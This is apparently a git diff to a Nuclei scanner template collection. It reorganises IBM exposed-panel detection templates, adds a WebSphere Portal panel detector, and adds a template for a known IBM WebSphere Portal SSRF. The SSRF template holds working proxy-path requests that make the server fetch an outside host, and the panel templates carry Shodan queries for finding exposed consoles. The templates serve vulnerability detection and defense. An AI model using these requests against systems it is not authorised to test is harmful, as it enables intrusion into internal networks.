diff --git a/exposed-panels/ibm-advanced-system-management.yaml b/exposed-panels/ibm/ibm-advanced-system-management.yaml
similarity index 95%
rename from exposed-panels/ibm-advanced-system-management.yaml
rename to exposed-panels/ibm/ibm-advanced-system-management.yaml
index 7b80a2a8a63..cde7ea576a6 100644
--- a/exposed-panels/ibm-advanced-system-management.yaml
+++ b/exposed-panels/ibm/ibm-advanced-system-management.yaml
@@ -4,7 +4,7 @@ info:
name: IBM Advanced System Management
author: dhiyaneshDK
severity: info
- tags: panel
+ tags: panel,ibm
metadata:
shodan-query: 'http.title:"Advanced System Management"'
@@ -18,6 +18,7 @@ requests:
- type: word
words:
- 'Advanced System Management'
+
- type: status
status:
- 200
diff --git a/exposed-panels/ibm-service-assistant.yaml b/exposed-panels/ibm/ibm-service-assistant.yaml
similarity index 95%
rename from exposed-panels/ibm-service-assistant.yaml
rename to exposed-panels/ibm/ibm-service-assistant.yaml
index 050371be3bc..14c562382f5 100644
--- a/exposed-panels/ibm-service-assistant.yaml
+++ b/exposed-panels/ibm/ibm-service-assistant.yaml
@@ -4,7 +4,7 @@ info:
name: IBM Service Assistant
author: dhiyaneshDK
severity: info
- tags: panel
+ tags: panel,ibm
metadata:
shodan-query: 'http.title:"Welcome to Service Assistant"'
@@ -18,6 +18,7 @@ requests:
- type: word
words:
- 'Welcome to Service Assistant'
+
- type: status
status:
- 200
diff --git a/exposed-panels/ibm/ibm-websphere-panel.yaml b/exposed-panels/ibm/ibm-websphere-panel.yaml
new file mode 100644
index 00000000000..ac774b932f0
--- /dev/null
+++ b/exposed-panels/ibm/ibm-websphere-panel.yaml
@@ -0,0 +1,27 @@
+id: ibm-websphere-panel
+
+info:
+ name: IBM WebSphere Panel
+ author: pdteam
+ severity: info
+ tags: ibm,websphere,panel
+
+requests:
+ - method: GET
+ path:
+ - '{{RootURL}}/wps/portal'
+
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'IBM WebSphere Portal'
+ - 'IBMPortalWeb'
+ condition: or
\ No newline at end of file
diff --git a/vulnerabilities/ibm/ibm-websphere-ssrf.yaml b/vulnerabilities/ibm/ibm-websphere-ssrf.yaml
new file mode 100644
index 00000000000..6e67a5db867
--- /dev/null
+++ b/vulnerabilities/ibm/ibm-websphere-ssrf.yaml
@@ -0,0 +1,28 @@
+id: ibm-websphere-ssrf
+
+info:
+ name: IBM WebSphere Portal SSRF
+ author: pdteam
+ severity: high
+ reference: https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
+ tags: ibm,ssrf,websphere
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/docpicker/internal_proxy/http/example.com'
+ - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/example.com'
+
+ redirects: true
+ max-redirects: 2
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Example Domain"
\ No newline at end of file